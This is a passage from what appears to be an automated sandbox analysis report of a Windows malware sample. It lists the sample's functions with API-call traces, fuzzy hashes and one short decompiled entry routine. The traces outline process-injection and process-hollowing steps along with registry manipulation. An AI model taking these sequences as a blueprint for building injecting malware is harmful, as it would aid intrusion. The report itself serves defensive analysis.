					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
